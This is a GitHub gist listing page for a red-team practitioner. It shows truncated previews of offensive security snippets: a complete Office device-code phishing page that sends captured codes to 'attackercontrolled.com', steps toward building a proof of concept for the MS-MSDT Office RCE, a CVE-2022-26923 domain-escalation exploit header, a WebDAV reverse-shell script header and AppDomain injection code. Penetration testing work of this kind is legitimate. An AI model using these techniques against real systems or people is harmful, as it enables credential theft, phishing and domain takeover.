Skip to content

Instantly share code, notes, and snippets.

Avatar

Steve Borosh rvrsh3ll

1.2k followers · 12 following
View GitHub Profile
@rvrsh3ll
rvrsh3ll / S3UpDown.ps1
Created August 21, 2022 15:23 — forked from pmolchanov/S3UpDown.ps1
Quick n Dirty S3 Upload/Download for Powershell
View S3UpDown.ps1
# Upload
&{
$ErrorActionPreference = 'Stop'
$AWSRegion = "us-east-1"
$AWSAccessKeyId = "TODO: Access Key"
$AWSSecretAccessKey = "TODO: Secret Access Key"
$BucketName = "TODO: Bucket Name"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms") | Out-Null
$OpenFileDialog = New-Object System.Windows.Forms.OpenFileDialog
$OpenFileDialog.ShowDialog() | Out-Null
@rvrsh3ll
rvrsh3ll / generate.html
Created August 1, 2022 01:03 — forked from Mr-Un1k0d3r/generate.html
office device code phishing
View generate.html
<!-- This page can be formatted to look like something more interesting -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script>
$.get("https://cors-anywhere.herokuapp.com/https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0&client_id=d3590ed6-52b3-4102-aeff-aad2292ab01c&resource=https://graph.windows.net").done(function(data) {
$.get("https://attackercontrolled.com/?id=" + data.device_code);
document.write(data.message);
});
</script>
@rvrsh3ll
rvrsh3ll / FindingComputersWithLocalAdmin.md
Created June 29, 2022 15:59 — forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful cypher queries to find computers that are local admin on other computers, or to find groups containing bother users/computers.
View FindingComputersWithLocalAdmin.md

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

@rvrsh3ll
rvrsh3ll / fxstmp.cs
Created June 1, 2022 19:46 — forked from code-scrap/fxstmp.cs
FXSTMP AppDomain Injection. - FXSTHIS!
View fxstmp.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
public sealed class MyAppDomainManager : AppDomainManager
{
public override void InitializeNewDomain(AppDomainSetup appDomainInfo)
{
@rvrsh3ll
rvrsh3ll / ms-msdt.MD
Created May 30, 2022 15:24 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
View ms-msdt.MD

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@rvrsh3ll
rvrsh3ll / certifried_with_krbrelayup.md
Created May 17, 2022 01:16 — forked from tothi/certifried_with_krbrelayup.md
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts
View certifried_with_krbrelayup.md

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from non-privileged user with the requirement adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. Combination of these two: non-privileged domain user escalating to Domain Admin without the requirement adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@rvrsh3ll
rvrsh3ll / Program.cs
Created May 12, 2022 11:45 — forked from dmchell/Program.cs
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
View Program.cs
// Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
// Author: @domchell - MDSec
// This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account
// Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :)
// Steps:
// 1. Escalate on any workstation (hint: krbrelayup ftw)
// 2. Execute UpdateMachineAccount.exe as SYSTEM
// 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp
// 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256)
@rvrsh3ll
rvrsh3ll / JEWebDav.ps1
Created May 10, 2022 16:20 — forked from darkquasar/JEWebDav.ps1
Simple WebDav Server in Powershell
View JEWebDav.ps1
<#
Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
#>
<#
.SYNOPSIS
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.
Read And Write Files Over WebDAV Proof Of Concept
@rvrsh3ll
rvrsh3ll / PowerView-3.0-tricks.ps1
Created March 4, 2022 15:28 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@rvrsh3ll
rvrsh3ll / payloads-to-s3.sh
Created February 26, 2022 16:38 — forked from tonykarre/payloads-to-s3.sh
Dynamically create S3 buckets to stage pen test tools/payloads. Files can only be downloaded by the target.
View payloads-to-s3.sh
#! /bin/bash
# Tony Karre
# @tonykarre
#
# payloads-to-s3.sh
#
# Use case:
#
# You are executing a pen test, and you want to temporarily stage payloads and other tools
# on a server outside of your own infrastructure. You also want to make sure that